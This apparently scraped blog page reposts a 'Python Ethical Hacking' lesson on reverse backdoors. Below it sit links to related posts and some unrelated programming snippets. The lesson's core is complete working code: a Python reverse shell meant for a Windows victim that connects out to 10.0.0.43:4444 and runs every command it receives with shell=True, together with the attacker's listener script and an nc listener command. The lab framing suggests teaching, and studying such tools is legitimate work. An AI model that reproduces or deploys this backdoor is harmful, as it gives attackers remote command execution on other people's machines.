REVERSE_BACKDOOR

  • Access file system.
  • Execute system commands.
  • Download files.
  • Upload files.
  • Persistence.

BACKDOORS

An interactive program gives access to a system its executed on.

  • Command execution.
  • Access file system.
  • Upload/download files.
  • Run keylogger.
  • ...etc

Write the Reverse backdoor Python script and execute on Windows machine. (Victim machine)

#!/usr/bin/env python

import socket

import subprocess

def execute_system_command(command):

    return subprocess.check_output(command, shell=True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection.connect(("10.0.0.43", 4444))

connection.send(b"\n[+] Connection established.\n")

while True:

    command = connection.recv(1024).decode()

    command_result = execute_system_command(command)

    connection.send(command_result)

connection.close()

Run the listening progress on the Kali Linux to establish the connection and execute the system commands.

nc -vv -l -p

Write and execute the Python Listener:

#!/usr/bin/env python

import socket

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

listener.bind(("10.0.0.43", 4444))

listener.listen(0)

print("[+] Waiting for incoming connections")

connection, address = listener.accept()

print("[+] Got a connection from " + str(address))

while True:

    command = input(">> ").encode()

    connection.send(command)

    result = connection.recv(1024).decode()

    print(result)

Python Ethical Hacking - BACKDOORS(1)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(3)

    BACKDOORS Sockets Problem: TCP is stream-based. Difficult to identify the end of message/batch. Solu ...

  3. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  4. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. Java 内存溢出(java.lang.OutOfMemoryError)的常见情况和处理方式

    导致OutOfMemoryError异常的常见原因有以下几种: 内存中加载的数据量过于庞大,如一次从数据库取出过多数据: 集合类中有对对象的引用,使用完后未清空,使得JVM不能回收: 代码中存在死循环 ...

  2. C# 加密、解密PDF文档(基于Spire.Cloud.SDK for .NET)

    Spire.Cloud.SDK for .NET提供了接口PdfSecurityApi可用于加密.解密PDF文档.本文将通过C#代码演示具体加密及解密方法. 使用工具: Spire.Cloud.SDK ...

  3. cb24a_c++_STL算法简介

    算法概述 算法部分主要由头文件<algorithm>,<numeric>和<functional>组成.       <algorithm>是所有STL ...

  4. scanf中的%[^\n]%*c格式

    scanf中的%[^\n]%*c格式 (2011-02-19 16:12:38) 转载▼ 标签:  控制字符 空白字符 字符串 变量 整数 it 分类: C语言编程 文章转载自http://blog. ...

  5. v-if和v-show的使用和特点

    v-if的特点是每次都会重新删除或创建操作 v-show的特点是每次不会进行DOM的删除和创建操作,只是切换了元素的display:none样式 <div id="app"& ...

  6. Linux上的Systemctl命令

    LinuxSystemctl是一个系统管理守护进程.工具和库的集合,用于取代System V.service和chkconfig命令,初始进程主要负责控制systemd系统和服务管理器.通过Syste ...

  7. IDEA记坑之移动项目文件之后,import 找不到文件以及出现Cannot access的问题

    今天本想挪动下文件,使项目更加可观,易整理,但是挪动后出现各种问题,import xxx;全部飘红.部分切面还出现Cannot access:试过了重启idea,rebuild....各种方法都行不通 ...

  8. 入门大数据---SparkSQL_Dataset和DataFrame简介

    一.Spark SQL简介 Spark SQL 是 Spark 中的一个子模块,主要用于操作结构化数据.它具有以下特点: 能够将 SQL 查询与 Spark 程序无缝混合,允许您使用 SQL 或 Da ...

  9. JDK8--07:并行流与串行流

    JDK8中,提供了并行流和串行流,使用parallel()和sequential()来处理,parallel()为并行流sequential()为串行流,两者可以相互转换,以最后一个为准 LongSt ...

  10. SQL中的ON DUPLICATE KEY UPDATE使用详解

    一:主键索引,唯一索引和普通索引的关系主键索引 主键索引是唯一索引的特殊类型. 数据库表通常有一列或列组合,其值用来唯一标识表中的每一行.该列称为表的主键. 在数据库关系图中为表定义一个主键将自动创建 ...